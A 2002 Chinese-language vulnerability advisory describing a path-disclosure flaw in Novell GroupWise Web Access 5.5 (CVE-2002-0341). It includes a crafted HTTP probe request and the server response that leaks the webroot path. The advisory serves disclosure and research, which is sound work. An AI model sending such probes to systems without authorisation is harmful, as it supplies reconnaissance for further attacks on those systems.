发布日期：2002-02-28
更新日期：2002-03-05

受影响系统：

Novell Groupwise 5.5

描述：

---

BUGTRAQ  ID: 4206
CVE(CAN) ID: CVE-2002-0341

Novell GroupWise是Novell出品的一种目录服务系统。

GroupWise Web Access 5.5所带的某些CGI在处理一些非预期的参数时会返回错误信息，其中包含了webroot目录的绝对路径信息，攻击者可能利用这些信息发动进一步攻击。


<*来源：Tamer Sahin （ts@securityoffice.net）
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Tamer Sahin （ts@securityoffice.net）提供了如下测试方法：

GET /cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA HTTP/1.0


HTTP/1.1 200 Document Follows
Date: Wed, 27 Feb 2002 22:27:08 GMT
Server:
MIME-version: 1.0
Content-type: text/html
Connection: close


Could not find file
SYS:\NOVONYX\SUITES~1\CGI-BIN\GW5\US\AAA\LOGIN.HTM

建议：

---

临时解决方法：

此问题没有合适的临时解决方案。

厂商补丁：

Novell
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.novell.com/

浏览次数：2907
严重程度：0（网友投票）